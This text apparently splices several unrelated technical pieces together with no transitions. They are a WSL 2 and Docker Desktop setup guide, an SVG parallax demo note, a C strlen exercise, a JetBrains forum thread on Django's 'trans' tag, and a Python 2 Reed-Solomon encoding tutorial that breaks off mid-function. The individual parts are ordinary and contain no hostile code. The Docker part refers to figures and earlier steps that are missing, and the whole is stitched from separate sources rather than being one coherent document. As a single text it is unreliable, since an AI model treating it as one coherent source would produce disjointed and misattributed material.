Currently, WSL 2 is available by default in Windows 10 Version 2004. However, users of Windows 10 Version 1903 (build number 18362.1049+) and Windows 10 Version 1909 (build number 18363.1049+) can manually upgrade to WSL 2. Follow the steps given in the next section to do so. Windows also allows both versions of WSL to run in parallel. We can run Ubuntu distro on a Windows machine with WSL 2 and Kali Linux with WSL 1.
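If WSL is already installed, the wsl command-line tool (available on recent Windows 10 builds) shows which version each distro uses and can convert a distro between the two versions. For example, assuming a distro named Ubuntu:

$wsl --list --verbose
$wsl --set-version Ubuntu 2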
Install WSL 2
To install WSL 2 on Windows 10 Version 1903 or Windows 10 Version 1909, follow the steps given below.
- Before installing WSL 2, you need to make sure that your OS build number is appropriate. To check this, do the following:
a. Press the Windows key + R and enter winver.
b. Click on OK. This shows the OS build information in a new window.
- If your OS build number conforms to the above-stated requirements, then skip this step. Otherwise, you need to update your OS to the latest version. This can be done by checking for available Windows updates and installing them. The steps for the same are given below:
a. Click on the Start button and open Settings. Then go to Update and Security.
b. Click on Check for updates and install all the available updates.
- Now, we need to enable the WSL and virtual machine platform features of Windows. For this, run the following commands in Windows PowerShell with administrative privileges:
$dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart $dism.exe /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart
4. Download the latest Linux kernel update package from Microsoft; separate packages are published for x64 and ARM64 machines. The command systeminfo | find ‘System Type’ shows the architecture used in your system. This will help you select the appropriate package.
5. Run the package downloaded in the previous step.
6. Restart the machine to finish WSL 2 installation.
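Optionally, you can also make WSL 2 the default version for any Linux distributions you install later by running the following command in PowerShell:

$wsl --set-default-version 2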
To know more about the nuances of each step or about troubleshooting errors, see Microsoft's WSL installation documentation.
Docker Desktop for Windows
Docker Desktop is an application that can be used on Windows for the development of containerised applications. It includes Docker Engine, Docker CLI client, Docker Compose, Notary, Kubernetes and Credential Helper. Using Docker Desktop, we can build and publish Docker images, run them in Docker containers, get information about the resource utilisation of containers, and much more, all through a user-friendly GUI. For experienced users, it also provides a CLI client. Docker Desktop also allows us to access the Docker Hub repository from its interface. Thus, we can download images from public repositories and private repositories.
But why is using Docker on a Windows machine difficult and not as seamless as in the case of Linux machines? What are the mechanisms that make this possible? The limitation of Docker is that it requires a Linux kernel: containers rely on kernel-level (OS-level) virtualisation, unlike type-1 and type-2 hypervisors, which provide hardware-level virtualisation. To run Docker on Windows, we therefore need virtualisation software that can provide a Linux kernel. Docker Desktop utilises Microsoft's Hyper-V hypervisor, which is a native hypervisor capable of creating virtual machines on x86-64 machines running the Windows operating system. Figure 8 shows how any Linux distribution can run on a full Linux kernel made available by WSL 2.
Docker Desktop integrates easily with WSL 2 and can be run with the WSL 2 backend, as it takes advantage of the full Linux kernel and Linux system call support provided by WSL 2. WSL 2 allows users to use Linux workspaces, and hence developers do not have to write different build scripts for Windows and Linux machines. The WSL 2 backend greatly reduces the resource requirements of running a container. This is because WSL 2 makes sure that Docker Desktop uses up memory and CPU only in the required amounts. The direct advantage of this fact is that the current version of Docker Desktop brings down the Docker daemon startup time to less than 10 seconds. Adding to this, when WSL 2 is running in a Windows machine, Docker commands can even be executed directly from Windows PowerShell.
It is very easy to install and run Docker Desktop with the WSL 2 backend. First, enable WSL 2 in your machine if it is not already enabled. Then, follow the given steps.
- Download the latest stable release of Docker Desktop for Windows from the Docker website.
- Run the downloaded installer by double-clicking it and following the instructions. Turn on the WSL 2 feature if prompted during installation.
- A Start menu entry of Docker Desktop gets created. Launch Docker Desktop from there.
- Go to the General tab on the Settings page.
- Select the ‘Use WSL 2 based engine’ checkbox if it is not selected by default, and then click on the Apply & Restart button.
Now, let us learn how to perform some basic operations using Docker Desktop GUI.
In the bottom-left corner, we can see the status of the Docker service. The left panel lists two tabs – Images and Containers/Apps. The Images tab shows various images created locally as well as in the private repository on Docker Hub. We can pull images from the Docker Hub repository by clicking on the Pull button that appears when we hover the mouse pointer over an image. The pulled image will then get listed in the local images tab. To run an image in a container, click on the Run button beside each local image. The new container window will open. Enter details like container name, port mappings, and volume mappings, and then click the Run button. This creates a container shown in the Containers/Apps tab, along with other containers created by us. Clicking on any container name shows the Details page of the container. This page has three options:
Logs: This shows the container output and logs generated during container execution, as shown in Figure 9.
Inspect: This shows various properties of the environment setup in the container. This includes properties like environment variables, ports, and volumes bound to the container, as shown in Figure 10.
Stats: This shows various container statistics like memory usage, CPU usage, data read from and written to the disk, and data sent and received over the network, as shown in Figure 11.
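These statistics can also be viewed from the CLI. The docker stats command streams live CPU, memory, network and disk I/O figures for running containers:

$docker stats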
One of the main advantages of using Docker Desktop on top of WSL 2 is that it allows us to execute Docker commands directly from the Windows PowerShell. The following command pulls the Jenkins image from Docker Hub (if not available locally) and runs it in a container:
$docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:lts
You can save the container as an image by running the following command:
$docker commit <container_name> <docker_hub_repository>/<new_image_name>:<image_tag>
Remember the image we saved as a tar file for migrating it from Docker Toolbox to Docker Desktop? It is now time to load that image. Run the following command to do so:
$docker load --input <image_name>.tar
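You can then confirm that the image was loaded by listing the local images:

$docker images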
Today, Docker has become an integral part of all DevOps (including DevSecOps, GitOps, AIOps, MLOps, etc) pipelines. It makes developing, building, and shipping containerised applications very easy. By using Docker containers, developers have to worry less about project dependencies as well as differences between development and deployment environments. Docker for Windows is another step towards this, as now different developers in a development team may use different operating systems and still collaborate seamlessly. WSL 2 makes it even easier to run Docker on Windows. For developers using older Windows systems, Docker Toolbox makes it possible for them to use Docker. All in all, it just helps developers to focus more on development and less on maintaining the environment.
This demo shows how it is possible to simulate a 3D scene in SVG, with the restriction that all the objects in the scene remain flat, and parallel to the projection plane (i.e. the screen). This is a setting similar to traditional cartoon animation where characters and scenery are painted on celuloid sheets ('cels'). The cels are then stacked together on a rostrum, to which proper lighting and additional effects are applied, and the final frame is shot on film.
Since the final setup is always a superimposition of 2D drawings, appropriately zoomed and positioned, it is possible to simulate it in SVG.
(I know the graphics could look better, but I'm not an artist. I prefer doing the maths. I used Amaya to edit the cels, by the way.)
Clicking and dragging the mouse will move the observer within the X-Y plane. If a key is pressed, clicking and dragging will make the observer move along X and Z, i.e. back and forth into the scenery. Rendering each frame is rather slow, so it might be desirable to turn off 'Higher Quality'. This simpler version should display faster:
Have a look at the source and read on, it's quite simple if you know a little bit of SVG and ECMAScript.
The cels are defined by one <g> element containing an id attribute called "cels". The child elements can be other <g> elements or any primitive. Each child element should contain a depth attribute from the demo's own namespace, which indicates the position of that cel along the Z axis. If depth is not specified, the depth is 0.
The ECMAScript code keeps track of the position of the observer, computes the final position and scale of each cel, and handles interactive motion. The rest of the code lets the user change the position of the observer through mouse movement and then renders the frame from the new position. Of course, other means of changing the position of the observer are possible, such as a predefined path in 3D space for a non-interactive animation.
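The core of the rendering is simple perspective scaling of each cel. The following is a minimal sketch, not the demo's actual code; the observer object, its focalLength value and the cel structure are illustrative assumptions:

function projectCel(cel, observer) {
    // Distance from the observer to the cel along the Z axis (must stay positive).
    var dz = cel.depth - observer.z;
    // Cels farther from the observer are drawn smaller...
    var scale = observer.focalLength / dz;
    // ...and near cels shift more than far ones as the observer moves:
    // the parallax effect.
    var tx = (cel.x - observer.x) * scale;
    var ty = (cel.y - observer.y) * scale;
    cel.element.setAttribute("transform",
        "translate(" + tx + "," + ty + ") scale(" + scale + ")");
}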
Dan Brickley gave me the idea of doing this when showing me a demo. Vincent Hardy and Dean Jackson provided help on SVG, especially about working around flaws in implementations.
Assign the size of userInput to stringSize. Ex: if userInput = "Hello", the output is: Size of userInput: 5
#include <stdio.h>
#include <string.h>
int main(void) {
char userInputArray[50] = "";
int stringInputSize = 0;
strcpy(userInputArray, "Hello");
/* Your solution starts here */
printf("Size of userInputArray: %d\n", stringInputSize);
return 0;
}
Please learn to use the debugger; it will help you see what your code is doing, and, believe me, it will help you understand what is wrong. When you don't know what your code should be doing, or why it does what it does, the debugger is the answer. Set a breakpoint and watch how your code performs: the debugger lets you execute lines one by one and inspect variables as each line runs, which makes it an incredible learning tool. The debugger is always there to show you what your code is actually doing; your task is to compare that with what it should be doing.
The code solution is as below:
strcpy(userInputArray, "Hello");
stringInputSize = strlen(userInputArray);
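One small caveat, not part of the original answer: strlen() returns a size_t, so assigning it to an int narrows the value, and %d then prints that int. An explicit cast makes the intent clear:

stringInputSize = (int)strlen(userInputArray); /* explicit narrowing cast */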
Unresolved tag 'trans'

Leo Trubach, created July 05, 2011 18:20

Hi! When editing my template I get the error "unresolved tag 'trans'", but this tag works when I run the development server. How do I fix it? Thank you.
Any ideas about this?
Hello Leo,
Do you have {% load i18n %} in the template where you use the 'trans' tag?
--
Dmitry Jemerov
Development Lead
JetBrains, Inc.
"Develop with Pleasure!"
Yes, I have the following lines in my template:
{% extends "base.html" %}
{% load i18n %}
and if I press the Ctrl key and click on i18n, the file c:\python27\Lib\site-packages\django\templatetags\i18n.py opens, and I can find the following lines there:
...
@register.tag("trans")
def do_translate(parser, token):
...
added issue on YouTrack
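For reference, the tag itself works at runtime once i18n is loaded; a minimal template using it might look like this (the string is an illustrative placeholder):

{% load i18n %}
<h1>{% trans "Welcome" %}</h1>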
This time we are going to look at Reed-Solomon codes, which can correct short bursts of errors. We'll see that encoding a message using Reed-Solomon is fairly simple, so easy that we can even do it in C on an embedded system.
We’re also going to talk about some performance metrics of error-correcting codes.
Reed-Solomon Codes
Reed-Solomon codes, like many other error-correcting codes, are parameterized. A Reed-Solomon \( (n,k) \) code, where \( n=2^m-1 \) and \( k=n-2t \), can correct up to \( t \) errors. They are not binary codes; each symbol must have \( 2^m \) possible values, and is typically an element of \( GF(2^m) \).
The Reed-Solomon codes with \( n=255 \) are very common, since then each symbol is an element of \( GF(2^8) \) and can be represented as a single byte. A \( (255, 247) \) RS code would be able to correct 4 errors, and a \( (255,223) \) RS code would be able to correct 16 errors, with each error being an arbitrary error in one transmitted symbol.
You may have noticed a pattern in some of the coding techniques discussed in the previous article:
- If we compute the parity of a string of bits, and concatenate a parity bit, the resulting message has a parity of zero modulo 2
- If we compute the checksum of a string of bytes, and concatenate a negated checksum, the resulting message has a checksum of zero modulo 256
- If we compute the CRC of a message (with no initial/final bit flips), and concatenate the CRC, the resulting message has a remainder of zero modulo the CRC polynomial
- If we compute parity bits of a Hamming code, and concatenate them to the data bits, the resulting message has a remainder of zero modulo the Hamming code polynomial
In all cases, we have this magic technique of taking data bits, using a division algorithm to compute the remainder, and concatenating the remainder, such that the resulting message has zero remainder. If we receive a message which does have a nonzero remainder, we can detect this, and in some cases use the nonzero remainder to determine where the errors occurred and correct them.
Parity and checksum are poor methods because they are unable to detect transpositions. It’s easy to cancel out a parity flip; it’s much harder to cancel out a CRC error by accidentally flipping another bit elsewhere.
What if there was an encoding algorithm that was somewhat similar to a checksum, in that it operated on a byte-by-byte basis, but had robustness to swapped bytes? Reed-Solomon is such an algorithm. And it amounts to doing the same thing as all the other linear coding techniques we’ve talked about to encode a message:
- take data bits
- use a polynomial division algorithm to compute a remainder
- create a codeword by concatenating the data bits and the remainder bits
- a valid codeword now has a zero remainder
In this article, I am going to describe Reed-Solomon encoding, but not the typical decoding methods, which are somewhat complicated, and include fancy-sounding steps like the Berlekamp-Massey algorithm (yes, this is the same one we saw in part VI, only it’s done in \( GF(2^m) \) instead of the binary \( GF(2) \) version), the Chien search, and the Forney algorithm. If you want to learn more, I would recommend reading the BBC white paper WHP031, in the list of references, which does go into just the right level of detail, and has lots of examples.
In addition to being more complicated to understand, decoding is also more computationally intensive. Reed-Solomon encoders are straightforward to implement in hardware — which we’ll see a bit later — and are simple to implement in software in an embedded system. Decoders are trickier, and you’d probably want something more powerful than an 8-bit microcontroller to execute them, or they’ll be very slow. The first use of Reed-Solomon in space communications was on the Voyager missions, where an encoder was included without certainty that the received signals could be decoded back on earth. From a NASA Tutorial on Reed-Solomon Error Correction Coding by William A. Geisel:
The Reed-Solomon (RS) codes have been finding widespread applications ever since the 1977 Voyager’s deep space communications system. At the time of Voyager’s launch, efficient encoders existed, but accurate decoding methods were not even available! The Jet Propulsion Laboratory (JPL) scientists and engineers gambled that by the time Voyager II would reach Uranus in 1986, decoding algorithms and equipment would be both available and perfected. They were correct! Voyager’s communications system was able to obtain a data rate of 21,600 bits per second from 2 billion miles away with a received signal energy 100 billion times weaker than a common wrist watch battery!
The statement “accurate decoding methods were not even available” in 1977 is a bit suspicious, although this general idea of faith-that-a-decoder-could-be-constructed is in several other accounts:
Lahmeyer, the sole engineer on the project, and his team of technicians and builders worked tirelessly to get the decoder working by the time Voyager reached Uranus. Otherwise, they would have had to slow down the rate of data received to decrease noise interference. “Each chip had to be hand wired,” Lahmeyer says. “Thankfully, we got it working on time.”
(Jefferson City Magazine, June 2015)
In order to make the extended mission to Uranus and Neptune possible, some new and never-before-tried technologies had to be designed into the spacecraft and novel new techniques for using the hardware to its fullest had to be validated for use. One notable requirement was the need to improve error correction coding of the data stream over the very inefficient method which had been used for all previous missions (and for the Voyagers at Jupiter and Saturn), because the much lower maximum data rates from Uranus and Neptune (due to distance) would have greatly compromised the number of pictures and other data that could have been obtained. A then-new and highly efficient data coding method called Reed-Solomon (RS) coding was planned for Voyager at Uranus, and the coding device was integrated into the spacecraft design. The problem was that although RS coding is easy to do and the encoding device was relatively simple to make, decoding the data after receipt on the ground is so mathematically intensive that no computer on Earth was able to handle the decoding task at the time Voyager was designed – or even launched. The increase of data throughput using the RS coder was about a factor of three over the old, standard Golay coding, so including the capability was considered highly worthwhile. It was assumed that a decoder could be developed by the time Voyager needed it at Uranus. Such was the case, and today RS coding is routinely used in CD players and many other common household electronic devices.
(Sirius Astronomer, August 2017)
Geisel probably meant “efficient” rather than “accurate”; decoding algorithms were well-known before a NASA report in 1978 which states
These codes were first described by I. S. Reed and G. Solomon in 1960. A systematic decoding algorithm was not discovered until 1968 by E. Berlekamp. Because of their complexity, the RS codes are not widely used except when no other codes are suitable.
Details of Reed-Solomon Encoding
At any rate, with Reed-Solomon, we have a polynomial, but instead of the coefficients being 0 or 1 like our usual polynomials in \( GF(2)[x] \), this time the coefficients are elements of \( GF(2^m) \). A byte-oriented Reed-Solomon encoding uses \( GF(2^8) \). The polynomial used in Reed-Solomon is usually written as \( g(x) \), the generator polynomial, with
$$g(x) = (x+\lambda^b)(x+\lambda^{b+1})(x+\lambda^{b+2})\ldots (x+\lambda^{b+n-k-1})$$
where \( \lambda \) is a primitive element of \( GF(2^m) \) and \( b \) is some constant, usually 0 or 1 or \( -t \). This means the polynomial’s roots are successive powers of \( \lambda \), and that makes the math work out just fine.
All we do is treat the message as a polynomial \( M(x) \), calculate a remainder \( r(x) = x^{n-k} M(x) \bmod g(x) \), and then concatenate it to the message; the resulting codeword \( C(x) = x^{n-k}M(x) + r(x) \), is guaranteed to be a multiple of the generator polynomial \( g(x) \). At the receiving end, we calculate \( C(x) \bmod g(x) \) and if it’s zero, everything’s great; otherwise we have to do some gory math, but this allows us to find and correct errors in up to \( t \) symbols.
That probably sounds rather abstract, so let’s work through an example.
Reed-Solomon in Python
We’re going to encode some messages using Reed-Solomon in two ways, first using the
unireedsolomon library, and then from scratch using
libgf2. If you’re going to use a library, you’ll need to be really careful; the library should be universal, meaning you can encode or decode any particular flavor of Reed-Solomon — like the CRC, there are many possible variants, and you need to be able to specify the polynomial of the Galois field used for each symbol, along with the generator element \( \lambda \) and the initial power \( b \). If anyone tells you they’re using the Reed-Solomon \( (255,223) \) code, they’re smoking something funny, because there’s more than one, and you need to know which particular variant in order to communicate properly.
There are two examples in the BBC white paper:
- one using \( RS(15,11) \) for 4-bit symbols, with symbol field \( GF(2)[y]/(y^4 + y + 1) \); for the generator, \( \lambda = y = {\tt 2} \) and \( b=0 \), forming the generator polynomial
$$\begin{align} g(x) &= (x+1)(x+\lambda)(x+\lambda^2)(x+\lambda^3) \cr &= x^4 + \lambda^{12}x^3 + \lambda^{4}x^2 + x + \lambda^6 \cr &= x^4 + 15x^3 + 3x^2 + x + 12 \cr &= x^4 + {\tt F} x^3 + {\tt 3}x^2 + {\tt 1}x + {\tt 12} \end{align}$$
- another using the DVB-T specification that uses \( RS(255,239) \) for 8-bit symbols, with symbol field \( GF(2)[y]/(y^8 + y^4 + y^3 + y^2 + 1) \) (hex representation 11d); for the generator, \( \lambda = y = {\tt 2} \) and \( b=0 \), forming the generator polynomial

$$\begin{align} g(x) &= (x+1)(x+\lambda)(x+\lambda^2)(x+\lambda^3)\ldots(x+\lambda^{15}) \cr &= x^{16} + 59x^{15} + 13x^{14} + 104x^{13} + 189x^{12} + 68x^{11} + 209x^{10} + 30x^9 + 8x^8 \cr &\qquad + 163x^7 + 65x^6 + 41x^5 + 229x^4 + 98x^3 + 50x^2 + 36x + 59 \cr &= x^{16} + {\tt 3B} x^{15} + {\tt 0D}x^{14} + {\tt 68}x^{13} + {\tt BD}x^{12} + {\tt 44}x^{11} + {\tt D1}x^{10} + {\tt 1E}x^9 + {\tt 08}x^8\cr &\qquad + {\tt A3}x^7 + {\tt 41}x^6 + {\tt 29}x^5 + {\tt E5}x^4 + {\tt 62}x^3 + {\tt 32}x^2 + {\tt 24}x + {\tt 3B} \end{align}$$
In unireedsolomon, the RSCoder class is used, with these parameters:

- c_exp: this is the number of bits per symbol, 4 and 8 for our two examples
- prim: this is the symbol field polynomial, 0x13 and 0x11d for our two examples
- generator: this is the generator element in the symbol field, 0x2 for both examples
- fcr: this is the "first consecutive root" \( b \), with \( b=0 \) for both examples
You can verify the generator polynomial by encoding the message \( M(x) = 1 \), all zero symbols with a trailing one symbol at the end; this will create a codeword \( C(x) = x^{n-k} + r(x) = g(x) \).
Let’s do it!
import unireedsolomon as rs

def codeword_symbols(msg):
    return [ord(c) for c in msg]

def find_generator(rscoder):
    """ Returns the generator polynomial of an RSCoder class """
    msg = [0]*(rscoder.k - 1) + [1]
    degree = rscoder.n - rscoder.k
    codeword = rscoder.encode(msg)
    # look at the trailing elements of the codeword
    return codeword_symbols(codeword[(-degree-1):])

rs4 = rs.RSCoder(15,11,generator=2,prim=0x13,fcr=0,c_exp=4)
print "g4(x) = %s" % find_generator(rs4)

rs8 = rs.RSCoder(255,239,generator=2,prim=0x11d,fcr=0,c_exp=8)
print "g8(x) = %s" % find_generator(rs8)
g4(x) = [1, 15, 3, 1, 12]
g8(x) = [1, 59, 13, 104, 189, 68, 209, 30, 8, 163, 65, 41, 229, 98, 50, 36, 59]
Easy as pie!
Encoding messages is just a matter of using either a string (byte array) or a list of message symbols, and we get a string back by default. (You can use encode(msg, return_string=False) but then you get a bunch of GF2Int objects back rather than integer coefficients.)

(Warning: the unireedsolomon package uses a global singleton to manage Galois field arithmetic, so if you want to have multiple RSCoder objects out there, they'll only work if they share the same field generator polynomial. This is why each time I want to switch back between the 4-bit and the 8-bit RSCoder, I have to create a new object, so that it reconfigures the way Galois field arithmetic works.)
The BBC white paper has a sample encoding only for the 4-bit \( RS(15,11) \) example, using \( [1,2,3,4,5,6,7,8,9,10,11] \) which produces remainder \( [3,3,12,12] \):
rs4 = rs.RSCoder(15,11,generator=2,prim=0x13,fcr=0,c_exp=4)
encmsg15 = codeword_symbols(rs4.encode([1,2,3,4,5,6,7,8,9,10,11]))
print "RS(15,11) encoded example message from BBC WHP031:\n", encmsg15
RS(15,11) encoded example message from BBC WHP031:
[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 3, 3, 12, 12]
The real fun begins when we can start encoding actual messages, like "Ernie, you have a banana in your ear!" Since this has length 37, let's use a shortened version of the code, \( RS(53,37) \).
Mama’s Little Baby Loves Shortnin’, Shortnin’, Mama’s Little Baby Loves Shortnin’ Bread
Oh, we haven’t talked about shortened codes yet — this is where we just omit the initial symbols in a codeword, and both transmitter and receiver agree treat them as implied zeros. An eight-bit \( RS(53,37) \) transmitter encodes as codeword polynomials of degree 52, and the receiver just zero-extends them to degree 254 (with 202 implied zero bytes added at the beginning) for the purposes of decoding just like any other \( RS(255,239) \) code.
rs8s = rs.RSCoder(53,37,generator=2,prim=0x11d,fcr=0,c_exp=8)
msg = 'Ernie, you have a banana in your ear!'
codeword = rs8s.encode(msg)
print ('codeword=%r' % codeword)
remainder = codeword[-16:]
print ('remainder(hex) = %s' % remainder.encode('hex'))
codeword='Ernie, you have a banana in your ear!U,\xa3\xb4d\x00:R\xc4P\x11\xf4n\x0f\xea\x9b'
remainder(hex) = 552ca3b464003a52c45011f46e0fea9b
That binary stuff after the message is the remainder. Now we can decode all sorts of messages with errors:
for init_msg in [
    'Ernie, you have a banana in your ear!',
    'Billy! You have a banana in your ear!',
    'Arnie! You have a potato in your ear!',
    'Eddie? You hate a banana in your car?',
    '01234567ou have a banana in your ear!',
    '012345678u have a banana in your ear!',
]:
    decoded_msg, decoded_remainder = rs8s.decode(init_msg+remainder)
    print "%s -> %s" % (init_msg, decoded_msg)
Ernie, you have a banana in your ear! -> Ernie, you have a banana in your ear!
Billy! You have a banana in your ear! -> Ernie, you have a banana in your ear!
Arnie! You have a potato in your ear! -> Ernie, you have a banana in your ear!
Eddie? You hate a banana in your car? -> Ernie, you have a banana in your ear!
01234567ou have a banana in your ear! -> Ernie, you have a banana in your ear!
---------------------------------------------------------------------------
RSCodecError                              Traceback (most recent call last)
<ipython-input> in <module>()
      9     decoded_msg, decoded_remainder = rs8s.decode(init_msg+remainder)

.../unireedsolomon/rs.pyc in decode(self, r, nostrip, k, erasures_pos, only_erasures, return_string)
--> 323         X, j = self._chien_search(sigma)

.../unireedsolomon/rs.pyc in _chien_search(self, sigma)
    823         if len(j) != errs_nb:
--> 824             raise RSCodecError("Too many (or few) errors found by Chien Search for the errata locator polynomial!")

RSCodecError: Too many (or few) errors found by Chien Search for the errata locator polynomial!
This last message failed to decode because there were 9 errors and \( RS(53,37) \) or \( RS(255,239) \) can only correct 8 errors.
But if there are few enough errors, Reed-Solomon will fix them all.
Why does it work?
The reason why Reed-Solomon encoding and decoding works is a bit hard to grasp. There are quite a few good explanations of how encoding and decoding works, my favorite being the BBC whitepaper, but none of them really dwells upon why it works. We can handwave about redundancy and the mysteriousness of finite fields spreading that redundancy evenly throughout the remainder bits, or a spectral interpretation of the parity-check matrix where the roots of the generator polynomial can be considered as “frequencies”, but I don’t have a good explanation. Here’s the best I can do:
Let’s say we have some number of errors where the locations are known. This is called an erasure, in contrast to a true error, where the location is not known ahead of time. Think of a bunch of symbols on a piece of paper, and some idiot erases one of them or spills vegetable soup, and you’ve lost one of the symbols, but you know where it is. The message received could be
45 72 6e 69 65 2c 20 ?? 6f 75, where the ?? represents an erasure. Of course, binary computers don’t have a way to compute arithmetic on ??, so what we would do instead is just pick an arbitrary pattern like 00 or 42 to replace the erasure, and mark its position (in this case, byte 7) for later processing.
Anyway, in a Reed-Solomon code, the error values are linearly independent. This is really the key here. We can have up to \( 2t \) erasures (as opposed to \( t \) true errors) and still maintain this linear independence property. Linear independence means that for a system of equations, there is only one solution. An error in bytes 3 and 28, for example, can’t be mistaken for an error in bytes 9 and 14. Once you exceed the maximum number of errors or erasures, the linear independence property falls apart and there are many possible ways to correct received errors, so we can’t be sure which is the right one.
To get a little more technical: we have a transmitted coded message \( C_t(x) = x^{n-k}M(x) + r(x) \) where \( M(x) \) is the unencoded message and \( r(x) \) is the remainder modulo the generator polynomial \( g(x) \), and a received message \( C_r(x) = C_t(x) + e(x) \) where the error polynomial \( e(x) \) represents the difference between transmitted and received messages. The receiver can compute \( e(x) \bmod g(x) \) by calculating the remainder \( C_r(x) \bmod g(x) \). If there are no errors, then \( e(x) \bmod g(x) = 0 \). With erasures, we know the locations of the errors. Let’s say we had \( n=255 \), \( 2t=16 \), and we had three errors at known locations \( i_1, i_2, \) and \( i_3, \) in which case \( e(x) = e_{i_1}x^{i_1} + e_{i_2}x^{i_2} + e_{i_3}x^{i_3} \). These terms \( e_{i_1}x^{i_1}, e_{i_2}x^{i_2}, \) etc. are the error values that form a linear independent set. For example, if the original message had
42 in byte 13, but we received 59 instead, then the error coefficient in that location would be 42 + 59 = 1B, so \( i_1 = 13 \) and the error value would be \( {\tt 1B}x^{13} \).
What the algebra of finite fields assures us is that if we have a suitable choice of generator polynomial \( g(x) \) of degree \( 2t \) — and the one used for Reed-Solomon, \( g(x) = \prod\limits_{i=0}^{2t-1}(x-\lambda^{b+i}) \), is suitable — then any selection of up to \( 2t \) distinct powers of \( x \) from \( x^0 \) to \( x^{n-1} \) is linearly independent modulo \( g(x) \). If \( 2t = 16 \), for example, then we cannot write \( x^{15} \equiv ax^{13} + bx^{8} + c \pmod{g(x)} \) for any choice of \( a,b,c \) — otherwise it would mean that \( x^{15}, x^{13}, x^8, \) and \( 1 \) do not form a linearly independent set. This means that if we have up to \( 2t \) erasures at known locations, then we can figure out the coefficients at each location, and find the unknown values.
In our 3-erasures example above, if \( 2t=16, i_1 = 13, i_2 = 8, i_3 = 0 \), then we have a really easy case. All the errors are in positions below the degree of the remainder, which means all the errors are in the remainder, and the message symbols arrived intact. In this case, the error polynomial looks like \( e(x) = e_{13}x^{13} + e_8x^8 + e_0 \) for some error coefficients \( e_{13}, e_8, e_0 \) in \( GF(256) \). The received remainder \( e(x) \bmod g(x) = e(x) \) and we can just find the error coefficients directly.
On the other hand, let’s say we knew the errors were in positions \( i_1 = 200, i_2 = 180, i_3 = 105 \). In this case we could calculate \( x^{200} \bmod g(x) \), \( x^{180} \bmod g(x) \), and \( x^{105} \bmod g(x) \). These each have a bunch of coefficients from degree 0 to 15, but we know that the received remainder \( e(x) \bmod g(x) \) must be a linear combination of the three polynomials, \( e_{200}x^{200} + e_{180}x^{180} + e_{105}x^{105} \bmod g(x) \) and we could solve for \( e_{200} \), \( e_{180} \), and \( e_{105} \) using linear algebra.
A similar situation applies if we have true errors where we don’t know their positions ahead of time. In this case we can correct only \( t \) errors, but the algebra works out so that we can write \( 2t \) equations with \( 2t \) unknowns (an error location and value for each of the \( t \) errors) and solve them.
All we need is for someone to prove this linear independence property. That part I won’t be able to explain intuitively. If you look at the typical decoder algorithms, they will show constructively how to find the unique solution, but not why it works. Reed-Solomon decoders make use of the so-called “key equation”; for Euclidean algorithm decoders (as opposed to Berlekamp-Massey decoders), the key equation is \( \Omega(x) = S(x)\Lambda(x) \bmod x^{2t} \) and you’re supposed to know what that means and how to use it… sigh. A bit of blind faith sometimes helps.
Which is why I won’t have anything more to say on decoding. Read the BBC whitepaper.
Reed-Solomon Encoding in libgf2
We don’t have to use the unireedsolomon library as a black box. We can do the encoding step in libgf2 using libgf2.lfsr.PolyRingOverField. This is a helper class that the undecimate() function uses. I talked a little bit about this in part XI, along with some of the details of this “two-variable” kind of mathematical thing, a polynomial ring over a finite field. Let’s forget about the abstract math for now, and just start computing. The PolyRingOverField just defines a particular arithmetic of polynomials, represented as lists of coefficients in ascending order (so \( x^2 + 2 \) is represented as [2, 0, 1]):
from libgf2.gf2 import GF2QuotientRing, GF2Polynomial
from libgf2.lfsr import PolyRingOverField
import numpy as np

f16 = GF2QuotientRing(0x13)
f256 = GF2QuotientRing(0x11d)
rsprof16 = PolyRingOverField(f16)
rsprof256 = PolyRingOverField(f256)
p1 = [1,4]
p2 = [2,8]
rsprof256.mul(p1, p2)
[2, 0, 32]
def compute_generator_polynomial(rsprof, elementfield, k):
    el = 1
    g = [1]
    n = (1 << elementfield.degree) - 1
    for _ in xrange(n-k):
        g = rsprof.mul(g, [el, 1])
        el = elementfield.mulraw(el, 2)
    return g

g16 = compute_generator_polynomial(rsprof16, f16, 11)
g256 = compute_generator_polynomial(rsprof256, f256, 239)
print "generator polynomials (in ascending order of coefficients)"
print "RS(15,11): g16=", g16
print "RS(255,239): g256=", g256
generator polynomials (in ascending order of coefficients)
RS(15,11): g16= [12, 1, 3, 15, 1]
RS(255,239): g256= [59, 36, 50, 98, 229, 41, 65, 163, 8, 30, 209, 68, 189, 104, 13, 59, 1]
Now, to encode a message, we just have to convert binary data to polynomials and then take the remainder \( \bmod g(x) \):
print "BBC WHP031 example for RS(15,11):"
msg_bbc = [1,2,3,4,5,6,7,8,9,10,11]
msgpoly = [0]*4 + [c for c in reversed(msg_bbc)]
print "message=%r" % msg_bbc
q,r = rsprof16.divmod(msgpoly, g16)
print "remainder=", r

print "\nReal-world example for RS(255,239):"
print "message=%r" % msg
msgpoly = [0]*16 + [ord(c) for c in reversed(msg)]
q,r = rsprof256.divmod(msgpoly, g256)
print "remainder=", r
print "in hex: ", ''.join('%02x' % b for b in reversed(r))
print "remainder calculated earlier:\n %s" % remainder.encode('hex')
BBC WHP031 example for RS(15,11):
message=[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]
remainder= [12, 12, 3, 3]

Real-world example for RS(255,239):
message='Ernie, you have a banana in your ear!'
remainder= [155, 234, 15, 110, 244, 17, 80, 196, 82, 58, 0, 100, 180, 163, 44, 85]
in hex:  552ca3b464003a52c45011f46e0fea9b
remainder calculated earlier:
 552ca3b464003a52c45011f46e0fea9b
See how easy that is?
Well… you probably didn’t, because PolyRingOverField hides the implementation of the abstract algebra. We can make the encoding step even easier to understand if we take the perspective of an LFSR.
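Before we switch gears, here’s one more sketch with these tools, tying back to the erasure discussion in the “Why does it work?” section. The positions and error values below are arbitrary choices of mine, and solve_gf256 is a small Gaussian-elimination helper I’m adding just for illustration; only mul, divmod, mulraw, and divraw come from libgf2:

def x_to_the_i_mod_g(i):
    # remainder of x^i modulo the generator polynomial,
    # padded out to all 16 coefficients (ascending order)
    q, rem = rsprof256.divmod([0]*i + [1], g256)
    return rem + [0]*(16 - len(rem))

def solve_gf256(A, b, field):
    # Gaussian elimination over GF(256); addition is XOR.
    # A is a tall matrix (more rows than columns); the system is
    # consistent by construction, so we reduce and read off b.
    A = [row[:] for row in A]
    b = b[:]
    ncols = len(A[0])
    for c in xrange(ncols):
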